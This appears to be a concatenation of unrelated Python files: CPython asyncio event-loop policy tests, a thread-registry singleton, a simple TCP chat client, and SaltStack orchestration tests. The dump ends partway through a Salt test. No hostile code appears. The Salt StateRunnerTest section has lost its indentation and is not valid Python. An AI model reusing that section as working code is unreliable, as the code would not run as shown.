            with self.assertRaises(NotImplementedError):
                await loop.create_datagram_endpoint(f)
            with self.assertRaises(NotImplementedError):
                await loop.sock_recv(f, 10)
            with self.assertRaises(NotImplementedError):
                await loop.sock_recv_into(f, 10)
            with self.assertRaises(NotImplementedError):
                await loop.sock_sendall(f, 10)
            with self.assertRaises(NotImplementedError):
                await loop.sock_connect(f, f)
            with self.assertRaises(NotImplementedError):
                await loop.sock_accept(f)
            with self.assertRaises(NotImplementedError):
                await loop.sock_sendfile(f, f)
            with self.assertRaises(NotImplementedError):
                await loop.sendfile(f, f)
            with self.assertRaises(NotImplementedError):
                await loop.connect_read_pipe(f, mock.sentinel.pipe)
            with self.assertRaises(NotImplementedError):
                await loop.connect_write_pipe(f, mock.sentinel.pipe)
            with self.assertRaises(NotImplementedError):
                await loop.subprocess_shell(f, mock.sentinel)
            with self.assertRaises(NotImplementedError):
                await loop.subprocess_exec(f)

        loop = asyncio.new_event_loop()
        loop.run_until_complete(inner())
        loop.close()
class PolicyTests(unittest.TestCase):
    """Tests for the event-loop policy machinery (get/set loop and policy)."""

    def test_event_loop_policy(self):
        # The abstract policy implements nothing.
        policy = asyncio.AbstractEventLoopPolicy()
        self.assertRaises(NotImplementedError, policy.get_event_loop)
        self.assertRaises(NotImplementedError, policy.set_event_loop, object())
        self.assertRaises(NotImplementedError, policy.new_event_loop)
        self.assertRaises(NotImplementedError, policy.get_child_watcher)
        self.assertRaises(NotImplementedError, policy.set_child_watcher,
                          object())

    def test_get_event_loop(self):
        policy = asyncio.DefaultEventLoopPolicy()
        self.assertIsNone(policy._local._loop)

        # First call lazily creates and caches the loop; later calls return it.
        loop = policy.get_event_loop()
        self.assertIsInstance(loop, asyncio.AbstractEventLoop)

        self.assertIs(policy._local._loop, loop)
        self.assertIs(loop, policy.get_event_loop())
        loop.close()

    def test_get_event_loop_calls_set_event_loop(self):
        policy = asyncio.DefaultEventLoopPolicy()

        with mock.patch.object(
                policy, "set_event_loop",
                wraps=policy.set_event_loop) as m_set_event_loop:

            loop = policy.get_event_loop()

            # policy._local._loop must be set through .set_event_loop()
            # (the unix DefaultEventLoopPolicy needs this call to attach
            # the child watcher correctly)
            m_set_event_loop.assert_called_with(loop)

        loop.close()

    def test_get_event_loop_after_set_none(self):
        # Explicitly clearing the loop makes get_event_loop() fail.
        policy = asyncio.DefaultEventLoopPolicy()
        policy.set_event_loop(None)
        self.assertRaises(RuntimeError, policy.get_event_loop)

    @mock.patch('asyncio.events.threading.current_thread')
    def test_get_event_loop_thread(self, m_current_thread):

        def f():
            # In a non-main thread with no loop set, get_event_loop() fails.
            policy = asyncio.DefaultEventLoopPolicy()
            self.assertRaises(RuntimeError, policy.get_event_loop)

        th = threading.Thread(target=f)
        th.start()
        th.join()

    def test_new_event_loop(self):
        policy = asyncio.DefaultEventLoopPolicy()

        loop = policy.new_event_loop()
        self.assertIsInstance(loop, asyncio.AbstractEventLoop)
        loop.close()

    def test_set_event_loop(self):
        policy = asyncio.DefaultEventLoopPolicy()
        old_loop = policy.get_event_loop()

        # Only AbstractEventLoop instances (or None) are accepted.
        self.assertRaises(AssertionError, policy.set_event_loop, object())

        loop = policy.new_event_loop()
        policy.set_event_loop(loop)
        self.assertIs(loop, policy.get_event_loop())
        self.assertIsNot(old_loop, policy.get_event_loop())
        loop.close()
        old_loop.close()

    def test_get_event_loop_policy(self):
        # The process-wide policy is created lazily and then cached.
        policy = asyncio.get_event_loop_policy()
        self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
        self.assertIs(policy, asyncio.get_event_loop_policy())

    def test_set_event_loop_policy(self):
        self.assertRaises(
            AssertionError, asyncio.set_event_loop_policy, object())

        old_policy = asyncio.get_event_loop_policy()

        policy = asyncio.DefaultEventLoopPolicy()
        asyncio.set_event_loop_policy(policy)
        self.assertIs(policy, asyncio.get_event_loop_policy())
        self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
    """Run the get_event_loop()/get_running_loop() tests against a specific
    implementation; subclasses fill in the four *_impl class attributes with
    either the pure-Python or the C-accelerated functions."""

    _get_running_loop_impl = None
    _set_running_loop_impl = None

    get_running_loop_impl = None
    get_event_loop_impl = None

    def setUp(self):
        # Save the current implementations, then swap in the chosen ones in
        # BOTH the events module and the asyncio package namespace.
        self._get_running_loop_saved = events._get_running_loop
        self._set_running_loop_saved = events._set_running_loop
        self.get_running_loop_saved = events.get_running_loop
        self.get_event_loop_saved = events.get_event_loop

        events._get_running_loop = type(self)._get_running_loop_impl
        events._set_running_loop = type(self)._set_running_loop_impl
        events.get_running_loop = type(self).get_running_loop_impl
        events.get_event_loop = type(self).get_event_loop_impl

        asyncio._get_running_loop = type(self)._get_running_loop_impl
        asyncio._set_running_loop = type(self)._set_running_loop_impl
        asyncio.get_running_loop = type(self).get_running_loop_impl
        asyncio.get_event_loop = type(self).get_event_loop_impl

        super().setUp()

        self.loop = asyncio.new_event_loop()
        asyncio.set_event_loop(self.loop)

        if sys.platform != 'win32':
            watcher = asyncio.SafeChildWatcher()
            watcher.attach_loop(self.loop)
            asyncio.set_child_watcher(watcher)

    def tearDown(self):
        try:
            if sys.platform != 'win32':
                asyncio.set_child_watcher(None)

            super().tearDown()
        finally:
            # Always restore the saved implementations, even if teardown of
            # the base class fails.
            self.loop.close()
            asyncio.set_event_loop(None)

            events._get_running_loop = self._get_running_loop_saved
            events._set_running_loop = self._set_running_loop_saved
            events.get_running_loop = self.get_running_loop_saved
            events.get_event_loop = self.get_event_loop_saved

            asyncio._get_running_loop = self._get_running_loop_saved
            asyncio._set_running_loop = self._set_running_loop_saved
            asyncio.get_running_loop = self.get_running_loop_saved
            asyncio.get_event_loop = self.get_event_loop_saved

    if sys.platform != 'win32':

        def test_get_event_loop_new_process(self):
            # bpo-32126: The multiprocessing module used by
            # ProcessPoolExecutor is not functional when the
            # multiprocessing.synchronize module cannot be imported.
            support.skip_if_broken_multiprocessing_synchronize()

            async def main():
                pool = concurrent.futures.ProcessPoolExecutor()
                result = await self.loop.run_in_executor(
                    pool, _test_get_event_loop_new_process__sub_proc)
                pool.shutdown()
                return result

            self.assertEqual(
                self.loop.run_until_complete(main()),
                'hello')

    def test_get_event_loop_returns_running_loop(self):
        class TestError(Exception):
            pass

        class Policy(asyncio.DefaultEventLoopPolicy):
            def get_event_loop(self):
                raise TestError

        old_policy = asyncio.get_event_loop_policy()
        try:
            asyncio.set_event_loop_policy(Policy())
            loop = asyncio.new_event_loop()

            # Outside a running loop, get_event_loop() delegates to the
            # policy, which raises here.
            with self.assertRaises(TestError):
                asyncio.get_event_loop()
            asyncio.set_event_loop(None)
            with self.assertRaises(TestError):
                asyncio.get_event_loop()

            with self.assertRaisesRegex(RuntimeError, 'no running'):
                self.assertIs(asyncio.get_running_loop(), None)
            self.assertIs(asyncio._get_running_loop(), None)

            async def func():
                # Inside a running loop all three accessors agree and the
                # policy is bypassed entirely.
                self.assertIs(asyncio.get_event_loop(), loop)
                self.assertIs(asyncio.get_running_loop(), loop)
                self.assertIs(asyncio._get_running_loop(), loop)

            loop.run_until_complete(func())

            asyncio.set_event_loop(loop)
            with self.assertRaises(TestError):
                asyncio.get_event_loop()

            asyncio.set_event_loop(None)
            with self.assertRaises(TestError):
                asyncio.get_event_loop()

        finally:
            asyncio.set_event_loop_policy(old_policy)
            if loop is not None:
                loop.close()

        with self.assertRaisesRegex(RuntimeError, 'no running'):
            self.assertIs(asyncio.get_running_loop(), None)

        self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
    # Exercise the mixin against the pure-Python accessor implementations.

    _get_running_loop_impl = events._py__get_running_loop
    _set_running_loop_impl = events._py__set_running_loop
    get_running_loop_impl = events._py_get_running_loop
    get_event_loop_impl = events._py_get_event_loop
try:
    import _asyncio  # NoQA
except ImportError:
    pass
else:
    class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
        # Run the same mixin tests against the C-accelerated accessor
        # implementations, only when the _asyncio extension is importable.

        _get_running_loop_impl = events._c__get_running_loop
        _set_running_loop_impl = events._c__set_running_loop
        get_running_loop_impl = events._c_get_running_loop
        get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
    """Minimal checks for the Server object returned by create_server()."""

    def test_get_loop(self):
        loop = asyncio.new_event_loop()
        self.addCleanup(loop.close)
        proto = MyProto(loop)
        # Port 0: let the OS pick a free ephemeral port.
        server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
        self.assertEqual(server.get_loop(), loop)
        server.close()
        loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
    """AbstractServer's methods must all raise NotImplementedError."""

    def test_close(self):
        with self.assertRaises(NotImplementedError):
            events.AbstractServer().close()

    def test_wait_closed(self):
        # wait_closed() is a coroutine, so a loop is needed to surface the error.
        loop = asyncio.new_event_loop()
        self.addCleanup(loop.close)

        with self.assertRaises(NotImplementedError):
            loop.run_until_complete(events.AbstractServer().wait_closed())

    def test_get_loop(self):
        with self.assertRaises(NotImplementedError):
            events.AbstractServer().get_loop()
if __name__ == '__main__':
    # Allow running this test module directly rather than via the test runner.
    unittest.main()
# ===== file: threadRecoder.py =====
from utils.singleton import singleton
from utils.log import Log
import threading
import time
logger = Log()()
@singleton
class threadRecorder():
    """Singleton registry that starts worker threads and tracks them by
    ``native_id`` so the heartbeat loop can report and reap finished ones."""

    def __init__(self):
        # native_id -> [thread name, threading.Thread]
        self.threads = {}
        # Guards self.threads against concurrent add()/heartbeat() access.
        self._lock = threading.Lock()
        logger.info('threadRecoder 初始化完成')

    def add(self, tname, func, args, daemon):
        """Start ``func`` in a new thread and register it under ``tname``.

        :param tname:  human-readable thread name used in log lines
        :param func:   target callable for the thread
        :param args:   argument tuple for ``func``, or None for no arguments
        :param daemon: passed through to threading.Thread(daemon=...)
        """
        with self._lock:
            if args is not None:
                a = threading.Thread(target=func, args=args, daemon=daemon)
            else:
                a = threading.Thread(target=func, daemon=daemon)
            a.start()
            # native_id is only available after start() (Python 3.8+).
            self.threads[a.native_id] = [tname, a]
            logger.info('[%s:%s]线程已启动,当前调起线程数: %s' % (a.native_id, tname, threading.active_count()))

    def heartbeat(self):
        """Every 180s: log the live thread list, then drop registry entries
        whose thread has finished. Intended to run forever in its own thread."""
        while True:
            time.sleep(180)
            logger.info('%s' % threading.enumerate())
            need_del = []
            with self._lock:
                # Collect first, delete second: the dict must not change size
                # while being iterated.
                for pid in self.threads:
                    if not self.threads[pid][1].is_alive():
                        need_del.append(pid)
                for pid in need_del:
                    logger.info('[%s:%s]已结束' % (pid, self.threads[pid][0]))
                    del self.threads[pid]
                # NOTE(review): indentation was lost in this paste; the lock is
                # assumed to also cover the summary below — confirm against VCS.
                op_lst = ['[%s:%s]' % (pid, self.threads[pid][0]) for pid in self.threads]
                logger.info('当前调起线程数: %s, Details: %s' % (threading.active_count(), ', '.join(op_lst)))
"""Simple TCP chat client: one thread receives broadcasts, one sends input.

Usage: client.py HOST PORT COLOUR
"""
import socket
import threading
from sys import argv

# ANSI escape codes used to colour this client's outgoing messages.
text_colour_dict = {'green': '\033[0;32m', 'red': '\033[0;31m', 'yellow': '\033[0;33m',
                    'light_cyan': '\033[96m', 'light_yellow': '\033[93m',
                    'bright_magenta': '\033[1;35;40m'}

local_host = argv[1]
port = int(argv[2])
colour = argv[3]
colour_chosen = text_colour_dict[colour]

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((local_host, port))

uname = input("Choose a username: ")


def recieve():
    """Receive loop: answer the server's handshake, then print broadcasts."""
    while True:
        try:
            msg = client.recv(1024).decode('ascii')
            if msg == 'Initalmsg':
                # Server's handshake probe: reply with our username.
                client.send(uname.encode('ascii'))
            else:
                print(msg)
        except OSError:
            # BUGFIX: was a bare ``except:`` that also swallowed
            # KeyboardInterrupt/SystemExit; only socket-level errors
            # mean the connection is gone.
            print("Connection failed")
            client.close()
            break


def write():
    """Send loop: read lines from stdin and send them in the chosen colour."""
    while True:
        msg = f'%s{uname} : {input("")}%s' % (colour_chosen, '\033[0m')
        client.send(msg.encode('ascii'))


recieve_thread = threading.Thread(target=recieve)
recieve_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
# ===== file: test_state.py =====
# -*- coding: utf-8 -*-
'''
Tests for the state runner
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import errno
import logging
import os
import re
import shutil
import signal
import tempfile
import time
import textwrap
import threading
# Import Salt Testing Libs
from tests.support.case import ShellCase
from tests.support.helpers import flaky, expensiveTest
from tests.support.mock import MagicMock, patch
from tests.support.paths import TMP
from tests.support.unit import skipIf
# Import Salt Libs
import salt.exceptions
import salt.utils.platform
import salt.utils.event
import salt.utils.files
import salt.utils.json
import salt.utils.stringutils
import salt.utils.yaml
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import queue
log = logging.getLogger(__name__)
@flaky
class StateRunnerTest(ShellCase):
'''
Test the state runner.
'''
def add_to_queue(self, q, cmd):
'''
helper method to add salt-run
return data to a queue
'''
ret = self.run_run(cmd)
q.put(ret)
q.task_done()
def test_orchestrate_output(self):
'''
Ensure the orchestrate runner outputs useful state data.
In Issue #31330, the output only contains ['outputter:', ' highstate'],
and not the full stateful return. This tests ensures we don't regress in that
manner again.
Also test against some sample "good" output that would be included in a correct
orchestrate run.
'''
ret_output = self.run_run('state.orchestrate orch.simple')
bad_out = ['outputter:', ' highstate']
good_out = [' Function: salt.state',
' Result: True',
'Succeeded: 1 (changed=1)',
'Failed: 0',
'Total states run: 1']
# First, check that we don't have the "bad" output that was displaying in
# Issue #31330 where only the highstate outputter was listed
assert bad_out != ret_output
# Now test that some expected good sample output is present in the return.
for item in good_out:
assert item in ret_output
def test_orchestrate_nested(self):
'''
test salt-run state.orchestrate and failhard with nested orchestration
'''
if os.path.exists('/tmp/ewu-2016-12-13'):
os.remove('/tmp/ewu-2016-12-13')
_, code = self.run_run(
'state.orchestrate nested-orch.outer',
with_retcode=True)
assert os.path.exists('/tmp/ewu-2016-12-13') is False
assert code != 0
def test_orchestrate_with_mine(self):
'''
test salt-run state.orchestrate with mine.get call in sls
'''
fail_time = time.time() + 120
self.run_run('mine.update "*"')
exp_ret = 'Succeeded: 1 (changed=1)'
while True:
ret = self.run_run('state.orchestrate orch.mine')
try:
assert exp_ret in ret
break
except AssertionError:
if time.time() > fail_time:
self.fail('"{0}" was not found in the orchestration call'.format(exp_ret))
def test_orchestrate_state_and_function_failure(self):
'''
Ensure that returns from failed minions are in the changes dict where
they belong, so they can be programatically analyzed.
See https://github.com/saltstack/salt/issues/43204
'''
self.run_run('saltutil.sync_modules')
ret = salt.utils.json.loads(
'\n'.join(
self.run_run('state.orchestrate orch.issue43204 --out=json')
)
)
# Drill down to the changes dict
state_ret = ret['data']['master']['salt_|-Step01_|-Step01_|-state']['changes']
func_ret = ret['data']['master']['salt_|-Step02_|-runtests_helpers.nonzero_retcode_return_false_|-function']['changes']
# Remove duration and start time from the results, since they would
# vary with each run and that would make it impossible to test.
for item in ('duration', 'start_time'):
state_ret['ret']['minion']['test_|-test fail with changes_|-test fail with changes_|-fail_with_changes'].pop(item)
self.assertEqual(
state_ret,
{
'out': 'highstate',
'ret': {
'minion': {
'test_|-test fail with changes_|-test fail with changes_|-fail_with_changes': {
'__id__': 'test fail with changes',
'__run_num__': 0,
'__saltfunc__': 'test.fail_with_changes',
'__sls__': 'orch.issue43204.fail_with_changes',
'changes': {
'testing': {
'new': 'Something pretended to change',
'old': 'Unchanged'
}
},
'comment': 'Failure!',
'name': 'test fail with changes',
'result': False,
}
}
}
}
)
self.assertEqual(
func_ret,
{'out': 'highstate', 'ret': {'minion': False}}
)
def test_orchestrate_target_exists(self):
'''
test orchestration when target exists
while using multiple states
'''
ret = self.run_run('state.orchestrate orch.target-exists')
first = [' ID: core',
' Function: salt.state',
' Result: True']
second = [' ID: test-state',
' Function: salt.state',
' Result: True']
third = [' ID: cmd.run',
' Function: salt.function',
' Result: True']
ret_out = [first, second, third]
for out in ret_out:
for item in out:
assert item in ret
def test_orchestrate_retcode(self):
'''
Test orchestration with nonzero retcode set in __context__
'''
self.run_run('saltutil.sync_runners')
self.run_run('saltutil.sync_wheel')
ret = '\n'.join(self.run_run('state.orchestrate orch.retcode'))
for result in (' ID: test_runner_success\n'
' Function: salt.runner\n'
' Name: runtests_helpers.success\n'
' Result: True',
' ID: test_runner_failure\n'
' Function: salt.runner\n'
' Name: runtests_helpers.failure\n'
' Result: False',
' ID: test_wheel_success\n'
' Function: salt.wheel\n'
' Name: runtests_helpers.success\n'
' Result: True',
' ID: test_wheel_failure\n'
' Function: salt.wheel\n'
' Name: runtests_helpers.failure\n'
' Result: False'):
self.assertIn(result, ret)
def test_orchestrate_retcode_async(self):
'''
Test orchestration with nonzero retcode set in __context__ for async
'''
self.run_run('saltutil.sync_runners')
self.run_run('saltutil.sync_wheel')
ret = "\n".join(self.run_run('state.orchestrate orch.retcode_async'))
self.assertIn('Succeeded: 4 (changed=4)\n', ret)
# scrub ephemeral output
ret = re.sub(r'\d', 'x', ret)
ret = re.sub('Duration: .*', 'Duration: x', ret)
ret = re.sub('Started: .*', 'Started: x', ret)
result = textwrap.dedent('''
ID: test_runner_success
Function: salt.runner
Name: runtests_helpers.success
Result: True
Comment: Runner function 'runtests_helpers.success' executed.
Started: x
Duration: x
Changes:
----------
return:
----------
jid:
xxxxxxxxxxxxxxxxxxxx
tag:
salt/run/xxxxxxxxxxxxxxxxxxxx
----------
ID: test_wheel_sucess
Function: salt.wheel
Name: runtests_helpers.success
Result: True
Comment: wheel submitted successfully.
Started: x
Duration: x
Changes:
----------
jid:
xxxxxxxxxxxxxxxxxxxx
tag:
salt/wheel/xxxxxxxxxxxxxxxxxxxx
----------
ID: test_function_sucess
Function: salt.function
Name: runtests_helpers.success
Result: True
Comment: Function submitted successfully.
Started: x
Duration: x
Changes:
----------
jid:
xxxxxxxxxxxxxxxxxxxx
minions:
- minion
----------
ID: test_state_sucess
Function: salt.state
Result: True
Comment: State submitted successfully.
Started: x
Duration: x
Changes:
----------
jid:
xxxxxxxxxxxxxxxxxxxx
minions:
- minion
''')
self.assertIn(result, ret)
def test_orchestrate_target_doesnt_exist(self):
'''
test orchestration when target doesn't exist
while using multiple states
'''
ret = self.run_run('state.orchestrate orch.target-doesnt-exists')
first = ['No minions matched the target. No command was sent, no jid was assigned.',
' ID: core',
' Function: salt.state',
' Result: False']
second = [' ID: test-state',
' Function: salt.state',
' Result: True']
third = [' ID: cmd.run',
' Function: salt.function',
' Result: True']
ret_out = [first, second, third]
for out in ret_out:
for item in out:
assert item in ret
def test_state_event(self):
'''
test to ensure state.event
runner returns correct data
'''
q = queue.Queue(maxsize=0)
cmd = 'state.event salt/job/*/new count=1'
expect = '"minions": ["minion"]'
server_thread = threading.Thread(target=self.add_to_queue, args=(q, cmd))
server_thread.setDaemon(True)
server_thread.start()
while q.empty():
self.run_salt('minion test.ping --static')
out = q.get()
assert expect in six.text_type(out)
server_thread.join()
def test_orchestrate_subset(self):
'''
test orchestration state using subset
'''
ret = self.run_run('state.orchestrate orch.subset', timeout=500)
def count(thing, listobj):
return sum([obj.strip() == thing for obj in listobj])
assert count('ID: test subset', ret) == 1
assert count('Succeeded: 1', ret) == 1
assert count('Failed: 0', ret) == 1
def test_orchestrate_salt_function_return_false_failure(self):
    '''
    Ensure that functions that only return False in the return
    are flagged as failed when run as orchestrations.
    See https://github.com/saltstack/salt/issues/30367
    '''
    self.run_run('saltutil.sync_modules')
    raw_output = self.run_run('state.orchestrate orch.issue30367 --out=json')
    ret = salt.utils.json.loads('\n'.join(raw_output))
    # Drill down to the changes dict
    state_data = ret['data']['master']['salt_|-deploy_check_|-test.false_|-function']
    assert state_data['result'] is False
    self.assertEqual(
        state_data['changes'],
        {'out': 'highstate', 'ret': {'minion': False}}
    )
@skipIf(salt.utils.platform.is_windows(), '*NIX-only test')
@flaky
class OrchEventTest(ShellCase):
    '''
    Tests for orchestration events
    '''
    def setUp(self):
        # Per-test deadline (seconds) enforced with SIGALRM in the event
        # loops below.
        self.timeout = 60
        self.master_d_dir = os.path.join(self.config_dir, 'master.d')
        try:
            os.makedirs(self.master_d_dir)
        except OSError as exc:
            # Directory may already exist from a previous test run.
            if exc.errno != errno.EEXIST:
                raise
        # Temporary master config snippet, removed automatically on close.
        self.conf = tempfile.NamedTemporaryFile(
            mode='w',
            suffix='.conf',
            dir=self.master_d_dir,
            delete=True,
        )
        # Scratch fileserver root where each test writes its SLS files.
        self.base_env = tempfile.mkdtemp(dir=TMP)
        self.addCleanup(shutil.rmtree, self.base_env)
        self.addCleanup(self.conf.close)
        for attr in ('timeout', 'master_d_dir', 'conf', 'base_env'):
            self.addCleanup(delattr, self, attr)
        # Force a reload of the configuration now that our temp config file has
        # been removed.
        self.addCleanup(self.run_run_plus, 'test.arg', __reload_config=True)

    def alarm_handler(self, signal, frame):
        # SIGALRM callback: aborts the test once self.timeout elapses.
        raise Exception('Timeout of {0} seconds reached'.format(self.timeout))

    def write_conf(self, data):
        '''
        Dump the config dict to the conf file
        '''
        self.conf.write(salt.utils.yaml.safe_dump(data, default_flow_style=False))
        self.conf.flush()

    @expensiveTest
    def test_jid_in_ret_event(self):
        '''
        Test to confirm that the ret event for the orchestration contains the
        jid for the jobs spawned.
        '''
        self.write_conf({
            'fileserver_backend': ['roots'],
            'file_roots': {
                'base': [self.base_env],
            },
        })
        state_sls = os.path.join(self.base_env, 'test_state.sls')
        with salt.utils.files.fopen(state_sls, 'w') as fp_:
            fp_.write(salt.utils.stringutils.to_str(textwrap.dedent('''
                date:
                  cmd.run
                ''')))
        # Orchestration exercising all four job types: state, function,
        # runner and wheel.
        orch_sls = os.path.join(self.base_env, 'test_orch.sls')
        with salt.utils.files.fopen(orch_sls, 'w') as fp_:
            fp_.write(salt.utils.stringutils.to_str(textwrap.dedent('''
                date_cmd:
                  salt.state:
                    - tgt: minion
                    - sls: test_state
                ping_minion:
                  salt.function:
                    - name: test.ping
                    - tgt: minion
                fileserver.file_list:
                  salt.runner
                config.values:
                  salt.wheel
                ''')))
        listener = salt.utils.event.get_event(
            'master',
            sock_dir=self.master_opts['sock_dir'],
            transport=self.master_opts['transport'],
            opts=self.master_opts)
        jid = self.run_run_plus(
            'state.orchestrate',
            'test_orch',
            __reload_config=True).get('jid')
        if jid is None:
            raise Exception('jid missing from run_run_plus output')
        signal.signal(signal.SIGALRM, self.alarm_handler)
        signal.alarm(self.timeout)
        try:
            while True:
                event = listener.get_event(full=True)
                if event is None:
                    continue
                if event['tag'] == 'salt/run/{0}/ret'.format(jid):
                    # Don't wrap this in a try/except. We want to know if the
                    # data structure is different from what we expect!
                    ret = event['data']['return']['data']['master']
                    for job in ret:
                        self.assertTrue('__jid__' in ret[job])
                    break
        finally:
            del listener
            signal.alarm(0)

    @expensiveTest
    def test_parallel_orchestrations(self):
        '''
        Test to confirm that the parallel state requisite works in orch
        we do this by running 10 test.sleep's of 10 seconds, and insure it only takes roughly 10s
        '''
        self.write_conf({
            'fileserver_backend': ['roots'],
            'file_roots': {
                'base': [self.base_env],
            },
        })
        orch_sls = os.path.join(self.base_env, 'test_par_orch.sls')
        with salt.utils.files.fopen(orch_sls, 'w') as fp_:
            fp_.write(textwrap.dedent('''
                {% for count in range(1, 20) %}
                sleep {{ count }}:
                  module.run:
                    - name: test.sleep
                    - length: 10
                    - parallel: True
                {% endfor %}
                sleep 21:
                  module.run:
                    - name: test.sleep
                    - length: 10
                    - parallel: True
                    - require:
                      - module: sleep 1
                '''))
        # (Redundant reassignment kept as-is.)
        orch_sls = os.path.join(self.base_env, 'test_par_orch.sls')
        listener = salt.utils.event.get_event(
            'master',
            sock_dir=self.master_opts['sock_dir'],
            transport=self.master_opts['transport'],
            opts=self.master_opts)
        start_time = time.time()
        jid = self.run_run_plus(
            'state.orchestrate',
            'test_par_orch',
            __reload_config=True).get('jid')
        if jid is None:
            raise Exception('jid missing from run_run_plus output')
        signal.signal(signal.SIGALRM, self.alarm_handler)
        signal.alarm(self.timeout)
        received = False
        try:
            while True:
                event = listener.get_event(full=True)
                if event is None:
                    continue
                # if we receive the ret for this job before self.timeout (60),
                # the test is implicitly successful; if it were happening in serial it would be
                # at least 110 seconds.
                if event['tag'] == 'salt/run/{0}/ret'.format(jid):
                    received = True
                    # Don't wrap this in a try/except. We want to know if the
                    # data structure is different from what we expect!
                    ret = event['data']['return']['data']['master']
                    for state in ret:
                        data = ret[state]
                        # we expect each duration to be greater than 10s
                        self.assertTrue(data['duration'] > 10000)
                    break
                # self confirm that the total runtime is roughly 30s (left 10s for buffer)
                self.assertTrue((time.time() - start_time) < 40)
        finally:
            self.assertTrue(received)
            del listener
            signal.alarm(0)

    @expensiveTest
    def test_orchestration_soft_kill(self):
        '''
        Test that a stage pre-marked via state.soft_kill is skipped when the
        orchestration runs: stage_two must not appear in the return data.
        '''
        self.write_conf({
            'fileserver_backend': ['roots'],
            'file_roots': {
                'base': [self.base_env],
            },
        })
        orch_sls = os.path.join(self.base_env, 'two_stage_orch_kill.sls')
        with salt.utils.files.fopen(orch_sls, 'w') as fp_:
            fp_.write(textwrap.dedent('''
                stage_one:
                  test.succeed_without_changes
                stage_two:
                  test.fail_without_changes
                '''))
        listener = salt.utils.event.get_event(
            'master',
            sock_dir=self.master_opts['sock_dir'],
            transport=self.master_opts['transport'],
            opts=self.master_opts)
        # Soft-kill the (future) jid before running, then force gen_jid to
        # produce exactly that jid so the kill applies to our run.
        mock_jid = '20131219120000000000'
        self.run_run('state.soft_kill {0} stage_two'.format(mock_jid))
        with patch('salt.utils.jid.gen_jid', MagicMock(return_value=mock_jid)):
            jid = self.run_run_plus(
                'state.orchestrate',
                'two_stage_orch_kill',
                __reload_config=True).get('jid')
        if jid is None:
            raise Exception('jid missing from run_run_plus output')
        signal.signal(signal.SIGALRM, self.alarm_handler)
        signal.alarm(self.timeout)
        received = False
        try:
            while True:
                event = listener.get_event(full=True)
                if event is None:
                    continue
                # Ensure that stage_two of the state does not run
                if event['tag'] == 'salt/run/{0}/ret'.format(jid):
                    received = True
                    # Don't wrap this in a try/except. We want to know if the
                    # data structure is different from what we expect!
                    ret = event['data']['return']['data']['master']
                    self.assertNotIn('test_|-stage_two_|-stage_two_|-fail_without_changes', ret)
                    break
        finally:
            self.assertTrue(received)
            del listener
            signal.alarm(0)

    def test_orchestration_with_pillar_dot_items(self):
        '''
        Test to confirm when using a state file that includes other state file, if
        one of those state files includes pillar related functions that will not
        be pulling from the pillar cache that all the state files are available and
        the file_roots has been preserved. See issues #48277 and #46986.
        '''
        self.write_conf({
            'fileserver_backend': ['roots'],
            'file_roots': {
                'base': [self.base_env],
            },
        })
        orch_sls = os.path.join(self.base_env, 'main.sls')
        with salt.utils.files.fopen(orch_sls, 'w') as fp_:
            fp_.write(textwrap.dedent('''
                include:
                  - one
                  - two
                  - three
                '''))
        # one.sls triggers a runner call at render time, bypassing the
        # pillar cache (the regression under test).
        orch_sls = os.path.join(self.base_env, 'one.sls')
        with salt.utils.files.fopen(orch_sls, 'w') as fp_:
            fp_.write(textwrap.dedent('''
                {%- set foo = salt['saltutil.runner']('pillar.show_pillar') %}
                placeholder_one:
                  test.succeed_without_changes
                '''))
        orch_sls = os.path.join(self.base_env, 'two.sls')
        with salt.utils.files.fopen(orch_sls, 'w') as fp_:
            fp_.write(textwrap.dedent('''
                placeholder_two:
                  test.succeed_without_changes
                '''))
        orch_sls = os.path.join(self.base_env, 'three.sls')
        with salt.utils.files.fopen(orch_sls, 'w') as fp_:
            fp_.write(textwrap.dedent('''
                placeholder_three:
                  test.succeed_without_changes
                '''))
        # (Redundant reassignment kept as-is.)
        orch_sls = os.path.join(self.base_env, 'main.sls')
        listener = salt.utils.event.get_event(
            'master',
            sock_dir=self.master_opts['sock_dir'],
            transport=self.master_opts['transport'],
            opts=self.master_opts)
        jid = self.run_run_plus(
            'state.orchestrate',
            'main',
            __reload_config=True).get('jid')
        if jid is None:
            raise salt.exceptions.SaltInvocationError('jid missing from run_run_plus output')
        signal.signal(signal.SIGALRM, self.alarm_handler)
        signal.alarm(self.timeout)
        received = False
        try:
            while True:
                event = listener.get_event(full=True)
                if event is None:
                    continue
                if event.get('tag', '') == 'salt/run/{0}/ret'.format(jid):
                    received = True
                    # Don't wrap this in a try/except. We want to know if the
                    # data structure is different from what we expect!
                    ret = event['data']['return']['data']['master']
                    for state in ret:
                        data = ret[state]
                        # Each state should be successful
                        self.assertEqual(data['comment'], 'Success!')
                    break
        finally:
            self.assertTrue(received)
            del listener
            signal.alarm(0)

    def test_orchestration_onchanges_and_prereq(self):
        '''
        Test that onchanges and prereq requisites against a salt.state target
        behave correctly in orchestration: they fire when the watched state
        reports changes (first test-mode run) and stay quiet when it does not
        (test-mode run after the file exists).
        '''
        self.write_conf({
            'fileserver_backend': ['roots'],
            'file_roots': {
                'base': [self.base_env],
            },
        })
        orch_sls = os.path.join(self.base_env, 'orch.sls')
        with salt.utils.files.fopen(orch_sls, 'w') as fp_:
            fp_.write(textwrap.dedent('''
                manage_a_file:
                  salt.state:
                    - tgt: minion
                    - sls:
                      - orch.req_test
                do_onchanges:
                  salt.function:
                    - tgt: minion
                    - name: test.ping
                    - onchanges:
                      - salt: manage_a_file
                do_prereq:
                  salt.function:
                    - tgt: minion
                    - name: test.ping
                    - prereq:
                      - salt: manage_a_file
                '''))
        listener = salt.utils.event.get_event(
            'master',
            sock_dir=self.master_opts['sock_dir'],
            transport=self.master_opts['transport'],
            opts=self.master_opts)
        try:
            jid1 = self.run_run_plus(
                'state.orchestrate',
                'orch',
                test=True,
                __reload_config=True).get('jid')
